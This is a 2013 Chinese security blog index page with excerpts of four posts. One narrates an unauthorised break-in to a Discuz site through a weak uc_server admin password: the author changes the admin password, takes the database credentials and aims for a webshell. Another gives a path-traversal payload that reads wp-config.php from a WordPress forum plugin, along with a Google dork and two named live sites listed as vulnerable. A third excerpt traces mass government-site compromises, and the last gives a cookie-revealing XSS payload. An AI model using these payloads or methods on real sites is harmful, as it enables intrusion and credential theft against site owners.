作者:Secer
发布时间:January 25, 2013
分类:渗透测试
简简单单日下黑客榜中榜
作者:Striker
QQ:954101430
Blog:http://strikersb.com/?p=52
正文:
其实我是看到Net user空间的日志了= 。= 于是手贱想试试,就有了下面的故事。
首先我看到网站,直接看了旁注,个人感觉主站没希望~
看到是Discuz直接进了uc_sever admin弱口令进去了= =。
![clip_image001[1] clip_image001[1]](http://img.cker.in/2beffc6f9edc_98AD/clip_image0011_thumb.jpg)
看了一下数据库,竟然不是root~ 他的服务器上只有两三个站,我还以为会是root呢 = =。
![clip_image002[1] clip_image002[1]](http://img.cker.in/2beffc6f9edc_98AD/clip_image0021_thumb.jpg)
果断改了一下管理员密码,
![clip_image003[1] clip_image003[1]](http://img.cker.in/2beffc6f9edc_98AD/clip_image0031_thumb.jpg)
果断拿到数据库的密码,虽然现在还没有用,先留着吧~
![clip_image004[1] clip_image004[1]](http://img.cker.in/2beffc6f9edc_98AD/clip_image0041_thumb.jpg)
看到这个,感觉插马拿shell是有希望了,于是信心满满~
![clip_image005[1] clip_image005[1]](http://img.cker.in/2beffc6f9edc_98AD/clip_image0051_thumb.jpg)
阅读剩余部分...
作者:Secer
发布时间:January 25, 2013
分类:Web安全,原创文章
WordPress Forums插件'url'参数任意文件泄露漏洞的利用
参考:
WordPress Zingiri Forums arbitrary file disclosure
http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/
Secunia Advisory SA50833
http://secunia.com/advisories/50833/
Analysis of vulnerability
The Zingiri Web Forums for WordPress writes our a header for the forum in forum.php through adding an action to wp_head.
44 add_action('wp_head','zing_forum_header');
686 function zing_forum_header()
687 {
688 global $zing_forum_content;
689 global $zing_forum_menu;
690 $output=zing_forum_output("content");
691
692 zing_integrator_cut($output,'<div id="footer">','</div>'); //remove footer
693 zing_integrator_cut($output,'<span class="forgot_password">','</span>');
694
695 $zing_forum_content=$output;
696
697 echo '<script type="text/javascript" language="javascript">';
698 echo "var zing_forum_url='".ZING_FORUM_URL."ajax/';";
699 echo "var zing_forum_index='".get_option('home')."/index.php?';";
700 echo "function zing_forum_url_ajax(s) { return zing_forum_url+s; }";
701 echo '</script>';
702
703 echo '<link rel="stylesheet" type="text/css" href="' . ZING_FORUM_URL . 'zing.css" media="screen" />';
704 }
So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes it into zing_forum_output, which is rather long. I’ve highlighted two areas:
456 function zing_forum_output($process) {
457 global $post,$wpdb,$zing_forum_loaded,$zing_forum_to_include,$zing_forum_mode;
458
459 $postVar=array();
460 switch ($process)
461 {
462 case "content":
463 if (isset($post)) $cf=get_post_custom($post->ID);
464 if (isset($_GET['zforum']))
465 {
466 $zing_forum_to_include=$_GET['zforum'];
467 $zing_forum_mode="forum";
468 }
We can affect the value of $zing_forum_to_include through the zforum GET variable. This is then used in a big else if statement. Here is the block of code that is executed if we set that to css:
541 } elseif ($zing_forum_to_include=='css') {
542 ob_end_clean();
543 if (isset($_GET['stylesheet'])) $key=$_GET['stylesheet'];
544 else $key=$_GET['url'];
545 if (isset($_SESSION['ccforum']['stylesheet'][$key])) {
546 $output=$_SESSION['ccforum']['stylesheet'][$key];
547 } else {
548 if (isset($_GET['stylesheet'])) {
549 $http=zing_forum_http("mybb",'css.php',"");
550 $news = new zHttpRequest($http,'zingiri-forum');
551 if (!$news->curlInstalled()) return "cURL not installed";
552 elseif (!$news->live()) return "A HTTP Error occured";
553 $output=$news->DownloadToString();
554 $output=str_replace('url(images/','url('.ZING_MYBB_URL.'/images/',$output);
555
556 } elseif ($_GET['url']) {
557 $url=$_GET['url'];
558 $output=file_get_contents(ZING_MYBB_DIR.'/cache/themes/'.$url);
559 }
560 $f[]='/^body.*{(.*?)/';
561 $r[]=' {$1';
562 $f[]='/.zingbody/';
563 $r[]='';
564 $f[]='/(.*?).{(.*?)/';
565 $r[]='.ccforum $1 {$2';
566 $f[]='/(.*?),(.*?).{(.*?)/';
567 $r[]='$1,.ccforum $2 {$3';
568 $f[]='/(.*?),(.*?),(.*?).{(.*?)/';
569 $r[]='$1,$2,.ccforum $3 {$4';
570 $output=preg_replace($f,$r,$output,-1,$count);
571 if ($output) $_SESSION['ccforum']['stylesheet'][$key]=$output;
572 }
573 header("Content-type: text/css");
574 echo $output;
575 die();
If we don’t set anything expect the “url” get variable, we can cause it to be fed into the file_get_contents call on line 554. We can abuse this to disclose the contents of the wp-config.php file like this:
http://URL/wordpress/?zforum=css&url=../../../../../../wp-config.php
谷歌:inurl:plugins/zingiri-forum
躺枪列表:
http://themakeupmorgue.com/?zforum=css&url=../../../../../../wp-config.php
http://www.4newdesign.com/?zforum=css&url=../../../../../../wp-config.php
修复手法:
1.4.2版对比1.4.4版
557 $url=$_GET['url'];
修改为
555 $url=str_replace('..','',$_GET['url']);
过滤了“..”,不让跳上层目录。
作者:Secer
发布时间:January 22, 2013
分类:Web安全
关于匿名者组织的疯狂拿站和统一黑页显示时间的行为,相信大家已经见怪不怪了,但是当匿名者组织开始侵略中国网站的时候,相信大家都坐不住了。首先,个人感觉反击的意义何在,或者说究竟有没有意义,笔者不是哲学家,思想家,不做过多探讨。但是,知己知彼确实是必要的。笔者对前一段时间,国内地方GOV被疯狂秒杀的一次行动做了一次没什么技术含量的分析和猜想。
(以下敏感域名用WWW.XXX.COM略过)
首先,笔者登陆了FACEBOOK找寻了一些热议的话题:
(以下为GOOGLE翻译,英文不好,只好找谷大哥帮忙)
1.中国3000+政务工作网站 匿名者成功获取权限
2.匿名者再次攻击亚洲各国,宣传独立自由 在网络中
3.亚洲强国网络安全成为匿名者的击打目标。
以上是通过匿名者为关键字模糊搜索的热议转载,基本每个热议都指向匿名者发布新闻和预告信的推特,笔者只好继续翻阅防火长城登陆推特,观看了一些匿名者发布针对亚洲和其他洲的攻击成果发布,评论中充斥着各种赞扬与羡慕,当然不乏我国人士(最大的悲剧),当然,也有进行技术分析的人,有一条评论中带有这样一个域名:
www.xxseo.com(化名)
接着,笔者C段了一下:
IP:
XXX.XXX.XXX.200
XXX.XXX.XXX.201
XXX.XXX.XXX.202
XXX.XXX.XXX.203
XXX.XXX.XXX.204
XXX.XXX.XXX.205
``````````````````````````````
以上IP全部指向中国某省级机房
OK,就这个IP段开始旁站扫描,得到无数四级域名:
XXX.host1068.xxxseo.com.cn
XXX.host1079.xxxseo.com.cn
XXX.host1081.xxxseo.com.cn
XXX.host1083.xxxseo.com.cn
XXX.host1093.xxxseo.com.cn
XXX.host1099.xxxseo.com.cn
·····························
相信看到这里,大家应该明白了些什么,当然笔者还是打开验证了下
无一例外,全部是政务网站,各地GOV。
XXX.host1099.xxxseo.com.cn
都是IDC机房托管的分配四级域名,实际绑定是WWW.XXX.GOV.CN
笔者继续扫描旁站,并导出所有URL(四级域名)
将导出的列表批量经行绑定域名反查,得到实际绑定域名结果列表。
在工具经行这些自动化扫描导出的时候,笔者继续做着准备,将匿名者在推特发布的攻击我国站点的列表下载了一份,可以不是文本,图片质量又狂差,只能美图秀秀去个雾(不会PS的伤不起),勉强看清了URL。
准备工作做完,手上有两份列表,一份是扫描旁站得出的IDC C段的GOV站点 URL列表。另一份是匿名者发布的攻击我国站点公开列表。
然后笔者比对了一下,相信结果大家都猜到了。
IDC下的163个GOV站点,有112个在匿名者攻击列表中,当然匿名者公布了3000+个。
好的,对匿名者每次行动的印象让我立即从庞大组织的集体攻击,变成了组织性的批量拿站。
这个时候,笔者又有了另一个猜想,即使是批量攻击,整个C段也是要花时间的,于是笔者爬行了5个网站的目录,BINGO,全中,居然是一模一样的目录结构,好的,原来是一个公司的业务啊!统一的建站系统,统一的OA系统,统一的邮件系统,统一的VPN登陆远程办公系统,好吧,你赢了!

阅读剩余部分...
作者:Secer
发布时间:January 22, 2013
分类:Web安全,原创文章
WordPress WP SlimStat是实时Web分析插件。 WordPress WP SlimStat 2.8.4及之前版本没有正确过滤wp-content/plugins/wp-slimstat/admin/view/panel1.php内index.php的 "s" 参数值,可被利用插入任意HTML和脚本代码。
查看版本:wordpress\wp-content\plugins\wp-slimstat\readme.txt
Stable tag: 2.8.4
利用方法如下:
前台搜索框提交XSS CODE:<script>alert(document.cookie);</script>
或URL:http://Target/wordpress/index.php?s=<script>alert(document.cookie);</script>
后台/wp-admin/index.php?page=wp-slimstat

- 1
- 2
- 3
- »